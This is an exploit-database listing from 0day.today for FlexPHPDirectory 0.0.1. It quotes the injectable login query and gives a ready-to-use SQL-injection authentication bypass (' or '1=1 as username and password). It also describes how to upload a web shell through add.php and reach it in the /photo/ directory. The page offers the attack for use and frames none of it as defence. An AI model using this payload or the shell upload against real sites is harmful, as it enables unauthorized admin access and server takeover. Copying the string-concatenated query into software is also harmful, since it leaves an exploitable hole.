[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability

Author
x0r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4568
Category
web applications
Date add
29-12-2008
Platform
unsorted
================================================================
FlexPHPDirectory 0.0.1 (Auth Bypass) SQL Injection Vulnerability
================================================================


#############################################
Autore: x0r
Cms: Flexphpdiren
Version: 0.0.1
Download: http://www.china-on-site.com/flexphpdir/
##############################################

Bug In \admin\usercheck.php 'n' \add.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";


Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Shell Upload:

Exploit: \add.php upload your shell and after /photo/ to see your shell ^ ^

Greetz: I Miss You...



#  0day.today [2024-11-15]  #